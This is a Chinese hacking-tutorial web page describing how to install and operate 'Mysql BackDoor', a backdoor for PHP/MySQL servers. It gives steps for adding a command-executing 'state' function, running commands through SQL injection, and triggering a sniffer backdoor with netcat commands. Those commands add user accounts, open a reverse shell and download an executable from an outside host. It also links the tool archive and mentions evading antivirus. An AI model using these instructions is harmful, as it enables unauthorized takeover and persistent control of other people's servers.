Mysql BackDoorDoor(图)

所属分类: 网络安全 / 黑客教程 阅读数: 157
收藏 0 赞 0 分享

Mysql BackDoor是一款针对PHP Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003 MYSQL5.0.X下通过.
[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.
[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
[卸载]
在Mysql上运行"drop function state"便可卸载,但同时会造成mysql进程退出,重启后恢复正常。
详细用法看压缩包内图文说明。http://blogimg.chinaunix.net/blog/upfile2/080712123321.rar
注意:能过杀毒软件,但过不了主动防御,主动防御太狠了,后门执行系统命令、发邮件、反向连接都会被发现。
发送Mysql-cmd c net user abc add,mysql backdoor运行cmd命令便会被主动防御截获:

发送Mysql-c-,mysql bookdoor运行管道重定向便会被主动防御截获,可见卡巴斯基监视了内存或句柄表:


更多精彩内容其他人还在看

网站脚本注入检测如何绕过限制

突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效
收藏 0 赞 0 分享

菜鸟拿WebShell的经验

通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来,希望对一些想学拿Webshell的朋友有一定的帮助。   首先我们要确定我们要检测的网站,可以是自己定下的某个网站,也可以是自己通过Go
收藏 0 赞 0 分享

黑客如何破坏杀毒软件

最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到底是如今的病毒过于厉害,还是杀毒软件的能力有限?今天我们就通过实例来看看是什么“刺瞎”了杀毒软件的双眼。   黑客姓名
收藏 0 赞 0 分享

UPDATE注射的两个基本模式

一.测试环境: OS: Windowsxp sp2 php: php 4.3.10 ( mysql 4.1.9 apache 1.3.33 二.测试数据库结构: -----start--- -- 数据库: `test`
收藏 0 赞 0 分享

Mysql BackDoorDoor(图)

Mysql BackDoor是一款针对PHP Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINX
收藏 0 赞 0 分享

用Shell做DEAMON后台来控制安全访问

如何做一个后台DEAMON来控制安全访问?这就是贯穿这篇文章的中心概念。 我的控制访问比较特殊,考虑到远程登陆点并非固定,所以无法设定固定IP通过SSH登陆服务器。这样N多IP会通过黑客软件试图破解您的用户名和密码(基本都是穷举,不怕一万只怕万一,因此我写了这个
收藏 0 赞 0 分享

教你在QQ空间挂马

今天我来跟大家谈论一下关于QQ空间挂马的原理,我试了一下,成功率占80%。 有好多人都问我怎么样才可以做到肉鸡成群,我想了好久,觉得QQ空间挂马可以实现这个。所以我试做了一下, 竟然成功了!~~那我就想大家介绍一下QQ空间挂马的原理吧!~ 大家把应该怎样把木马
收藏 0 赞 0 分享

爆破的一般思路与断点的设置

破 顾名思义就是暴力修改程序的代码来达到破解的目的 当然根据共享软件的注册方式我们可以对症下药 比如说没有注册的软件有功能限制、使用次数限制、使用日期限制等 我们就可以分别对待了!我们只需要解除这些限制自然就达到了破解的目的了! 暴力破解的一
收藏 0 赞 0 分享

解析RootKit与反RootKit(图)

Rootkit是一个或者多个用于隐藏、控制一台计算机的工具包,该技术被越来越多地应用于一些恶意软件中。在基于Windows的系统中Rootkit更多地用于隐藏程序或进程,系统被注入Rootkit后就可以在不为用户察觉的情况下进行某些操作。因此,其隐蔽性极高,危害也极大。下面笔
收藏 0 赞 0 分享

VC 下黑客软件隐蔽程序的手段

一、引言 随着计算机网络的不断发展,黑客技术也日益成为一支不可忽视的技术力量,尽管多数黑客的攻击目标以服务器为主,对大多数的互连网用户的直接危害并不大。但有一类称为"特洛伊木马"的黑客程序可以通过欺骗等手段在普通网络用户端安装木马的服务端,使
收藏 0 赞 0 分享
查看更多